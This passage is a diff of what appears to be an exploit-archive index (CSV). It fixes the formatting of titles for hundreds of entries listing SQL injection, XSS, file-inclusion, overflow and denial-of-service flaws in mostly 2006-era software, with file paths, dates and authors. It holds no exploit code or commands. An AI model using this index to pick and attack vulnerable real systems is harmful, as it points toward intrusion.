Nael",windows,remote,0 -28119,platforms/php/webapps/28119.txt,"vCard PRO 0 gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28120,platforms/php/webapps/28120.txt,"vCard PRO 0 rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28121,platforms/php/webapps/28121.txt,"vCard PRO 0 create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28122,platforms/php/webapps/28122.txt,"vCard PRO 0 search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28119,platforms/php/webapps/28119.txt,"vCard PRO - gbrowse.php cat_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28120,platforms/php/webapps/28120.txt,"vCard PRO - rating.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28121,platforms/php/webapps/28121.txt,"vCard PRO - create.php card_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 +28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 Index.PHP Directory Traversal Vulnerability",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 @@ -25186,7 +25186,7 @@ id,file,description,date,author,platform,type,port 28164,platforms/windows/dos/28164.html,"Microsoft Internet Explorer 6.0 Href Title Denial of Service Vulnerability",2006-07-04,jsz,windows,dos,0 28165,platforms/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial of Service Vulnerability",2006-07-05,"Dennis Cox",osx,dos,0 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 Index.PHP Date Parameter SQL Injection Vulnerability",2006-07-05,"Alejandro Ramos",php,webapps,0 -28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x Multiple SQL Injection Vulnerabilities",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 +28167,platforms/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injection Vulnerabilities",2006-07-05,"CrAzY CrAcKeR",php,webapps,0 28168,platforms/php/webapps/28168.txt,"Blog:CMS 4.1 Thumb.PHP Remote File Include Vulnerability",2006-07-05,"EllipSiS Security",php,webapps,0 28169,platforms/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability",2006-07-06,hdm,windows,dos,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 PASS Command SEH Overflow (msf)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 @@ -25199,8 +25199,8 @@ id,file,description,date,author,platform,type,port 28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x users/browse.php cat Parameter XSS",2006-07-06,"Security News",php,webapps,0 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x admin/fix_content.php submit Parameter XSS",2006-07-06,"Security News",php,webapps,0 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0 -28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 Remote Denial of Service Vulnerability",2006-07-06,tuergeist,multiple,dos,0 -28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Stored XSS vulnerability",2013-09-10,loneferret,windows,remote,0 +28182,platforms/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service Vulnerability",2006-07-06,tuergeist,multiple,dos,0 +28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Stored XSS Vulnerability",2013-09-10,loneferret,windows,remote,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php, cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow Vulnerability",2006-07-06,"Luigi Auriemma",windows,remote,0 @@ -25239,7 +25239,7 @@ id,file,description,date,author,platform,type,port 28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service Vulnerability",2006-07-14,hdm,linux,dos,0 28221,platforms/php/webapps/28221.pl,"Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)",2006-07-13,1dt.w0lf,php,webapps,0 -28222,platforms/windows/dos/28222.txt,"microsoft works 8.0 spreadsheet Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 +28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include Vulnerability",2006-07-14,"Chironex Fleckeri",php,webapps,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 @@ -25277,7 +25277,7 @@ id,file,description,date,author,platform,type,port 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 RootDirectory Remote File Include Vulnerability",2006-07-24,MFox,php,webapps,0 28261,platforms/php/webapps/28261.txt,"RadScripts a_editpage.php filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 Page Parameter SQL Injection Vulnerability",2006-07-24,"EllipSiS Security",php,webapps,0 -28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability",2006-07-24,"J. Oquendo",windows,dos,0 +28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service Vulnerability",2006-07-24,"J. Oquendo",windows,dos,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 Include.PCchess.PHP Remote File Include Vulnerability",2006-07-24,OLiBekaS,php,webapps,0 28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability",2006-07-24,hdm,windows,dos,0 28266,platforms/windows/dos/28266.txt,"AGEphone 1.28/1.38 SIP Packet Handling Buffer Overflow Vulnerability",2006-07-24,"Tan Chew Keong",windows,dos,0 @@ -25325,8 +25325,8 @@ id,file,description,date,author,platform,type,port 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injection Vulnerabilities",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.PHP Remote File Include Vulnerability",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.PHP Remote File Include Vulnerability",2006-07-31,CeNGiZ-HaN,php,webapps,0 -28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 -28314,platforms/linux/remote/28314.c,"bomberclone 0.11 Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 +28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 +28314,platforms/linux/remote/28314.c,"bomberclone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 Module.PHP Directory Traversal Vulnerability",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 @@ -25336,7 +25336,7 @@ id,file,description,date,author,platform,type,port 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0 28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 Error.PHP Information Disclosure Vulnerability",2006-08-01,SirDarckCat,php,webapps,0 28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 UpdatePF.PHP Authentication Bypass Vulnerability",2006-08-01,SirDarckCat,php,webapps,0 -28324,platforms/php/webapps/28324.txt,"Blackboard Products 6 Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 +28324,platforms/php/webapps/28324.txt,"Blackboard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 28325,platforms/php/webapps/28325.txt,"OZJournals 1.5 - Multiple Input Validation Vulnerabilities",2006-08-02,Luny,php,webapps,0 28326,platforms/php/webapps/28326.txt,"VWar 1.x war.php page Parameter XSS",2006-08-03,mfoxhacker,php,webapps,0 28327,platforms/php/webapps/28327.txt,"VWar 1.x war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0 @@ -25378,24 +25378,24 @@ id,file,description,date,author,platform,type,port 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 Profile.PHP Directory Traversal Vulnerability",2006-08-09,"Chris Boulton",php,webapps,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability",2006-08-09,"Susam Pal",multiple,remote,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x Mybloggie_Root_Path Parameter Multiple Remote File Include Vulnerabilities",2006-06-02,sh3ll,php,webapps,0 -28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 -28368,platforms/multiple/remote/28368.txt,"ArcSoft MMS Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 +28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 +28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 ANI Image File Denial of Service Vulnerability",2006-08-09,sehato,windows,dos,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.PHP Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x Index.PHP Cross-Site Scripting Vulnerability",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities",2006-08-10,x0r0n,php,webapps,0 28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 Ascan_6.ASP ActiveX Control Cross-Site Scripting Vulnerability",2006-08-10,Lostmon,windows,remote,0 -28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x Directory Traversal Vulnerability",2006-08-10,"Tassi Raeburn",windows,remote,0 +28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal Vulnerability",2006-08-10,"Tassi Raeburn",windows,remote,0 28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 (default.mo) Language File Integer Overflow Vulnerability",2013-09-18,LiquidWorm,windows,dos,0 28376,platforms/windows/remote/28376.html,"McKesson ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 28377,platforms/php/webapps/28377.txt,"Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 Fname Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.PHP Remote File Include Vulnerability",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0 -28381,platforms/windows/dos/28381.txt,"microsoft windows xp/2000/2003 help Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 +28381,platforms/windows/dos/28381.txt,"Microsoft windows xp/2000/2003 help Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 28382,platforms/php/webapps/28382.txt,"WP-DB Backup For Wordpress 1.6/1.7 Edit.PHP Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0 -28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 +28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service Vulnerability",2006-08-13,"Yan Rong Ge",linux,dos,0 28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service Vulnerability",2006-08-15,nop,windows,dos,0 @@ -25410,7 +25410,7 @@ id,file,description,date,author,platform,type,port 28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component Reporter.sql.PHP Remote File Include Vulnerability",2006-08-16,Crackers_Child,php,webapps,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x GAS Buffer Overflow Vulnerability",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 -28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 +28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption Vulnerability",2006-08-17,nop,windows,remote,0 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service Vulnerability",2006-08-08,XSec,windows,dos,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 Dir_Plugins Parameter Multiple Remote File Include Vulnerabilities",2006-08-17,Drago84,php,webapps,0 @@ -25431,7 +25431,7 @@ id,file,description,date,author,platform,type,port 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x TCMS_Administer Parameter Remote File Include Vulnerability",2006-08-21,You_You,php,webapps,0 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic Index.PHP Remote File Include Vulnerability",2006-08-21,night_warrior771,php,webapps,0 -28420,platforms/windows/dos/28420.htm,"Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0 +28420,platforms/windows/dos/28420.htm,"Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos,0 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.PHP Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0 @@ -25480,7 +25480,7 @@ id,file,description,date,author,platform,type,port 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Include Vulnerabilities",2006-09-01,MATASANOS,php,webapps,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE Local Denial of Service Vulnerability",2006-09-01,"David Matousek",windows,dos,0 28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 Profile.PHP Cross-Site Scripting Vulnerability",2006-09-01,Crack_MaN,php,webapps,0 -28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x Remote File Include Vulnerability",2006-09-01,h4ck3riran,php,webapps,0 +28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Include Vulnerability",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Include Vulnerability",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.PHP SQL Injection Vulnerability",2006-09-02,SirDarckCat,php,webapps,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 Multi-Egghunter",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 @@ -25515,7 +25515,7 @@ id,file,description,date,author,platform,type,port 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 Index.PHP Cross-Site Scripting Vulnerability",2006-09-11,"HACKERS PAL",php,webapps,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 index.php lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 -28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal vulnerability",2009-09-12,"securma massine",windows,remote,0 +28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal Vulnerability",2009-09-12,"securma massine",windows,remote,0 28513,platforms/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service Vulnerability",2006-09-12,"securma massine",windows,dos,0 28514,platforms/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 Terminal Parameter Directory Traversal Vulnerability",2006-09-12,"Chris Murtagh",cgi,webapps,0 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 rightbar.php suser Parameter XSS",2006-09-12,s3rv3r_hack3r,php,webapps,0 @@ -25570,7 +25570,7 @@ id,file,description,date,author,platform,type,port 28567,platforms/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injection Vulnerabilities",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 Links.PHP HTTP Response Splitting Vulnerability",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Include Vulnerability",2006-09-14,igi,php,webapps,0 -28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 +28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 admin/inc/footer.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 admin/inc/header.inc.php Multiple Parameter XSS",2006-09-14,"HACKERS PAL",php,webapps,0 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 login.php username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 @@ -25602,7 +25602,7 @@ id,file,description,date,author,platform,type,port 28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 Lostpassword.PHP Cross-Site Scripting Vulnerability",2006-09-18,s3rv3r_hack3r,php,webapps,0 28600,platforms/asp/webapps/28600.txt,"EShoppingPro 1.0 Search_Run.ASP SQL Injection Vulnerability",2006-09-18,ajann,asp,webapps,0 28601,platforms/php/webapps/28601.txt,"PT News 1.7.8 Search.PHP Cross-Site Scripting Vulnerability",2006-09-18,Snake,php,webapps,0 -28602,platforms/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",multiple,remote,0 +28602,platforms/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",multiple,remote,0 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 Index.PHP Cross-Site Scripting Vulnerability",2006-09-19,meto5757,php,webapps,0 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 Search.PHP Cross-Site Scripting Vulnerability",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 @@ -25708,10 +25708,10 @@ id,file,description,date,author,platform,type,port 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 Home.PHP Cross-Site Scripting Vulnerability",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 -28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0 +28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.PHP3 - Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.PHP Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0 28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0 -28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 +28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.PHP Remote File Include Vulnerability",2006-09-27,ThE-WoLf-KsA,php,webapps,0 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 @@ -25721,7 +25721,7 @@ id,file,description,date,author,platform,type,port 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget Script.PHP Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 -28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 +28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28732,platforms/php/webapps/28732.txt,"Yblog funk.php id Parameter XSS",2006-09-30,You_You,php,webapps,0 @@ -25770,7 +25770,7 @@ id,file,description,date,author,platform,type,port 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x IMAP SMTP Command Injection Vulnerability",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 -28778,platforms/php/webapps/28778.txt,"ironwebmail <= 6.1.1 - Directory Traversal information disclosure vulnerability",2006-10-16,"Derek Callaway",php,webapps,0 +28778,platforms/php/webapps/28778.txt,"ironwebmail <= 6.1.1 - Directory Traversal information disclosure Vulnerability",2006-10-16,"Derek Callaway",php,webapps,0 28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.PHP Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.PHP Remote File Include Vulnerabilities",2006-10-10,k1tk4t,php,webapps,0 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.PHP Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 @@ -25813,12 +25813,12 @@ id,file,description,date,author,platform,type,port 28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.PHP Remote File Include Vulnerability",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,Lostmon,php,webapps,0 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.PHP Remote File Include Vulnerability",2006-10-16,ERNE,php,webapps,0 -28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 0 Clspack.exe Local Buffer Overflow Vulnerability",2006-10-16,mmd_000,windows,dos,0 +28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow Vulnerability",2006-10-16,mmd_000,windows,dos,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 Edit User HTML Injection Vulnerability",2006-10-16,MP,php,webapps,0 28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 Rpc.PHP Unauthorized Access Vulnerability",2006-10-18,jonepet,php,webapps,0 -28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 Multiple Remote File Include Vulnerabilities",2006-10-18,Matdhule,php,webapps,0 +28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Include Vulnerabilities",2006-10-18,Matdhule,php,webapps,0 28828,platforms/php/webapps/28828.txt,"Zorum 3.5 DBProperty.PHP Remote File Include Vulnerability",2006-10-19,MoHaNdKo,php,webapps,0 28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System Index.ASP SQL Injection Vulnerability",2006-10-18,fireboy,asp,webapps,0 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 Index.PHP Remote File Include Vulnerability",2006-10-19,"Alireza Ahari",php,webapps,0 @@ -25834,7 +25834,7 @@ id,file,description,date,author,platform,type,port 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28841,platforms/php/webapps/28841.txt,"RMSOFT Gallery System 2.0 Images.PHP Cross-Site Scripting Vulnerability",2006-10-23,FREAK_PR,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online 